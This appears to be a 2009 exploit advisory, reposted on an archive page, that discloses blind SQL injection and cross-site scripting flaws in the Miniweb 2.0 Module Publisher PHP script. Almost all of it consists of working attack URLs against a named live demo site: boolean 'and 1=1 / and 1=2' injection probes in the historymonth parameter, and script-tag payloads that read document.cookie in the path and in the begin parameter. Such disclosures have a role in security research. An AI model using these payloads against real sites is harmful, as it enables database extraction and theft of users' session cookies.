Home / os / win10

miniwebpub-sqlxss.txt

Posted on 30 July 2009

########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ \_ |_____| |_____| /_/ \_ |_| |_| ============================================================================== [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ============================================================================== [»] Miniweb 2.0 Module Publisher (bSQL/XSS) Multiple Remote Vulnerabilities ============================================================================== [»] Script: [ Miniweb 2.0 ] [»] Language: [ PHP ] [»] Download: [ http://www.miniweb2.com/index.php?module=sitebuilder&sitebuilder_id=17 ] [»] Founder: [ Moudi <m0udi@9.cn> ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...] [»] Team: [ EvilWay ] [»] Dork: [ OFF ] [»] Price: [ $250.00 ] [»] Site : [ https://security-shell.ws/forum.php ] ########################################################################### ===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]=== [»] http://www.site.com/patch/index.php?historyyear=2009&historymonth=[BLIND] [»] http://miniweb2.com/moduledemo/publisher/index.php?historyyear=2009&historymonth=02 and 1=1 <= TRUE [»] http://miniweb2.com/moduledemo/publisher/index.php?historyyear=2009&historymonth=02 and 1=2 <= FALSE ===[ Exploit XSS + LIVE : vulnerability ]=== [»] http://www.site.com/patch/index.php/[XSS] [»] http://www.site.com/patch/index.php?loginaction=1&begin=[XSS] [»] http://miniweb2.com/moduledemo/publisher/index.php/"><script>alert(document.cookie);</script> [»] http://miniweb2.com/moduledemo/publisher/index.php?loginaction=1&begin="><script>alert(document.cookie);</script> Note: have some other XSS on index.php .. Author: Moudi ###########################################################################

 

TOP